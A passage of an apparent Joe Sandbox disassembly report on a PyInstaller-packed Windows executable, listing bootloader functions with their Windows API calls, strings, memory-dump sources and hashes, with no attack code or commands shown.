String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: e3191d3c1863fdc148b865684561a8a90bf1fbfb0db1f2a60b60e414af9c3315
Instruction ID: f9aa253ff31f097a39ff7a706b0a844dd83a5a011c3ff1dd571196b4892575de
Opcode Fuzzy Hash: e3191d3c1863fdc148b865684561a8a90bf1fbfb0db1f2a60b60e414af9c3315
Instruction Fuzzy Hash: E6517061B0864792EA10BB69DC005B9E350FF98B94FC44532EE4C477B6DE3CF5A58BA0

Function 00007FF72B8D8660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF72B8D3CBB), ref: 00007FF72B8D8704
GetCurrentProcessId.KERNEL32(?,00000000,00007FF72B8D3CBB), ref: 00007FF72B8D870A
CreateDirectoryW.KERNELBASE(?,00000000,00007FF72B8D3CBB), ref: 00007FF72B8D874C

Part of subcall function 00007FF72B8D8830: GetEnvironmentVariableW.KERNEL32(00007FF72B8D388E), ref: 00007FF72B8D8867
Part of subcall function 00007FF72B8D8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF72B8D8889

Part of subcall function 00007FF72B8E8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E8251

Part of subcall function 00007FF72B8D2810: MessageBoxW.USER32 ref: 00007FF72B8D28EA

Strings

_MEI%d, xrefs: 00007FF72B8D8712
TMP, xrefs: 00007FF72B8D869C, 00007FF72B8D87A3
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF72B8D877E
TMP, xrefs: 00007FF72B8D86C2
LOADER: failed to set the TMP environment variable., xrefs: 00007FF72B8D86DC

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
Instruction ID: d2345c6543765e264ab90d7685f15ac31d760d90272b99bf8276e1ecfc6ee386
Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
Instruction Fuzzy Hash: 71417311A2968344E914BB7D9C552BD9251EF89BD0FC44132EE0D477BAEE3CF5218BA0

Function 00007FF72B8D1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1.3.1, xrefs: 00007FF72B8D1249
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF72B8D141E
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF72B8D1276
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF72B8D12BA
malloc, xrefs: 00007FF72B8D12C1, 00007FF72B8D12F6
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF72B8D12EF

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: edbc7fc629fea5b907d296325bff14fa59ab7a9c376bf005d102d457c092301b
Instruction ID: 70982729061d2ee812199c06d9d71a0232f84629ba6655aece818a46d1b3a1eb
Opcode Fuzzy Hash: edbc7fc629fea5b907d296325bff14fa59ab7a9c376bf005d102d457c092301b
Instruction Fuzzy Hash: E951C722A0868381EA20BB69EC403BAE291FF49794FC44136ED4D477E5DE3CE551CB90

Function 00007FF72B8D36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF72B8D3804), ref: 00007FF72B8D36E1
GetLastError.KERNEL32(?,00007FF72B8D3804), ref: 00007FF72B8D36EB

Part of subcall function 00007FF72B8D2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF72B8D3706,?,00007FF72B8D3804), ref: 00007FF72B8D2C9E
Part of subcall function 00007FF72B8D2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF72B8D3706,?,00007FF72B8D3804), ref: 00007FF72B8D2D63
Part of subcall function 00007FF72B8D2C50: MessageBoxW.USER32 ref: 00007FF72B8D2D99

Strings

GetModuleFileNameW, xrefs: 00007FF72B8D36FA
Failed to obtain executable path., xrefs: 00007FF72B8D36F3
Failed to resolve full path to executable %ls., xrefs: 00007FF72B8D3739
Failed to convert executable path to UTF-8., xrefs: 00007FF72B8D3790
\\?\, xrefs: 00007FF72B8D375A

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: c99aa29a0c735624d203afccad223d355c7bb9937555e98453bc0679cc027d00
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: F3215151B1C94381FA21BB39EC103B6A260FF98394FC04136D65D825F5EE2CE624CFA0

Function 00007FF72B8EBA5C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8EBE89

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
Instruction ID: e23871be3cada3db13a2e8b4bad44665a974c2f0483f515fe474b1232877768e
Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
Instruction Fuzzy Hash: 18C1D722A0C6C791E6607B9998802BDB791EB85B90FD94131FA4D037B1CE7CE4658FA0

Function 00007FF72B8D2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF72B8D351A,?,00000000,00007FF72B8D3F1B), ref: 00007FF72B8D2AA0

Strings

Warning, xrefs: 00007FF72B8D2B1E
[PYI-%d:%s] , xrefs: 00007FF72B8D2AA8
Warning [ANSI Fallback], xrefs: 00007FF72B8D2B0F
WARNING, xrefs: 00007FF72B8D2AAF
0, xrefs: 00007FF72B8D2B16

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: cd9fd4cb8801d4bcc6d67ca7fe4496cd12bb7ef9c39d1b90da3f85ea28895337
Instruction ID: 62befc1430bc7d7a69f93e8c897353565319eaedfcca201569f155e8dbfa2ee9
Opcode Fuzzy Hash: cd9fd4cb8801d4bcc6d67ca7fe4496cd12bb7ef9c39d1b90da3f85ea28895337
Instruction Fuzzy Hash: E221867261878252E710AB69F8417E6A394FF887C4FC00136FE8C53669DF3CD1558B90

Function 00007FF72B8D8570 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF72B8D8590
OpenProcessToken.ADVAPI32 ref: 00007FF72B8D85A3
GetTokenInformation.KERNELBASE ref: 00007FF72B8D85C8
GetLastError.KERNEL32 ref: 00007FF72B8D85D2
GetTokenInformation.KERNELBASE ref: 00007FF72B8D8612
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72B8D862E
CloseHandle.KERNEL32 ref: 00007FF72B8D8646

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
Instruction ID: 71f44a326e59ec410575eb33a50ac39e9248a5811487a74ae60791e88661f75e
Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
Instruction Fuzzy Hash: F0212421A0C64341EA50AB69F94422EE7A0EB95FB0FD40236E66D436F4DE6CE4558F50

Function 00007FF72B8D8ED0 Relevance: 9.1, APIs: 6, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF72B8D3FA9), ref: 00007FF72B8D8EFD
K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF72B8D3FA9), ref: 00007FF72B8D8F5A

Part of subcall function 00007FF72B8D9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B8D45F4,00000000,00007FF72B8D1985), ref: 00007FF72B8D93C9

K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF72B8D3FA9), ref: 00007FF72B8D8FE5
K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF72B8D3FA9), ref: 00007FF72B8D9044
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF72B8D3FA9), ref: 00007FF72B8D9055
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF72B8D3FA9), ref: 00007FF72B8D906A

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: f379f6e01e7bdc27e2139475387bba5ebb451a11f5ba19d8eac3eaf905c79616
Instruction ID: bfd2f43db7651d105a4971550c791567a0a83e9d577e9b2c8b89981c417e2af4
Opcode Fuzzy Hash: f379f6e01e7bdc27e2139475387bba5ebb451a11f5ba19d8eac3eaf905c79616
Instruction Fuzzy Hash: 8841A761A1968381EA30AB26BC002BAB394FB85BD4FC44536DF4D577A9DE3CE510CF50

Function 00007FF72B8D90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B8D8570: GetCurrentProcess.KERNEL32 ref: 00007FF72B8D8590
Part of subcall function 00007FF72B8D8570: OpenProcessToken.ADVAPI32 ref: 00007FF72B8D85A3
Part of subcall function 00007FF72B8D8570: GetTokenInformation.KERNELBASE ref: 00007FF72B8D85C8
Part of subcall function 00007FF72B8D8570: GetLastError.KERNEL32 ref: 00007FF72B8D85D2
Part of subcall function 00007FF72B8D8570: GetTokenInformation.KERNELBASE ref: 00007FF72B8D8612
Part of subcall function 00007FF72B8D8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72B8D862E
Part of subcall function 00007FF72B8D8570: CloseHandle.KERNEL32 ref: 00007FF72B8D8646

LocalFree.KERNEL32(?,00007FF72B8D3C55), ref: 00007FF72B8D916C
LocalFree.KERNEL32(?,00007FF72B8D3C55), ref: 00007FF72B8D9175

Strings

Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF72B8D9183
S-1-3-4, xrefs: 00007FF72B8D9121
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF72B8D9142
D:(A;;FA;;;%s), xrefs: 00007FF72B8D9157

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction ID: 905cb40e80bbe9a60eab84154667caae38cb272563dd436cefb3332e392bd35e
Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction Fuzzy Hash: 2D212121A1874291FA10BB24EC153EAA265FF98780FC44536EA4D437A6DF3CE9558BE0

Function 00007FF72B8ECF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B8ECF4B), ref: 00007FF72B8ED07C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B8ECF4B), ref: 00007FF72B8ED107

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction ID: 5bbf64303253fc9f8c5c06b8bd27981561e065d55b1430ab203aeb1210f48975
Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction Fuzzy Hash: 3291D622F1869285F750AFAD9C4027DABA0EB44788F944139EE0E566A4DF3CE455CB60

Function 00007FF72B8E5628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E5655
CreateFileW.KERNELBASE ref: 00007FF72B8E5694
CloseHandle.KERNEL32 ref: 00007FF72B8E56C9

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction ID: d8d54f81faa141709e7f36f6ce808371c2732d028ecd045e9bd3cdb547db9683
Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction Fuzzy Hash: 83418622D287C183E750AF64D9103A9A3A0FB95764F509335F65C03AE6DF7CA5F08BA0

Function 00007FF72B8DCC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B8DCE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF72B8DCE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF72B8DCC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF72B8DCCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF72B8DCD21

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction ID: 824dbe80b0b410ccabe1df417a11a0a2bbb05fb2f5412c2559b5a5bf50a8c691
Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction Fuzzy Hash: E0313720E4814381EA54BB7D9C522B9A681DF92384FC45036EB4E472F3DE6CA8248FA0

Function 00007FF72B8E9A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF72B8E9A2C), ref: 00007FF72B8E9A41
TerminateProcess.KERNEL32(?,?,?,00007FF72B8E9A2C), ref: 00007FF72B8E9A4C
ExitProcess.KERNEL32 ref: 00007FF72B8E9A5B

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction ID: fbd9ade996f63501f7526e35cb1984e9f3324b44783111c1c296440814e80ca3
Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction Fuzzy Hash: 7BD09E10F0874642EB143BB85C591789256EF58701FD4143CD91F063B3DD7CF8694BA0

Function 00007FF72B8E013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E0180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E0277

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: 9bd733ee343d8ad1255975108555ebbf3eb1a36e1a3cb2200df24f79fbb146fa
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: 09512D21B092C186E725B9AD9C0167AE191EF44BA4F884B34FD7C077E5CE3CD4219EA0

Function 00007FF72B8EAB58 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF72B8EA9D5,?,?,00000000,00007FF72B8EAA8A), ref: 00007FF72B8EABC6
GetLastError.KERNEL32(?,?,?,00007FF72B8EA9D5,?,?,00000000,00007FF72B8EAA8A), ref: 00007FF72B8EABD0

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: 4b4851903d0cc304c49270510b3e9958e5155dbcc2857228cdc93d188fed74a1
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: FF21A411B186C241EA9077D99C9037DA692DFC4BA0F884239F93E477F1CF7CA4614B60

Function 00007FF72B8EC134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF72B8EC2CD), ref: 00007FF72B8EC180
GetLastError.KERNEL32(?,?,?,?,?,00007FF72B8EC2CD), ref: 00007FF72B8EC18A

Memory Dump Source

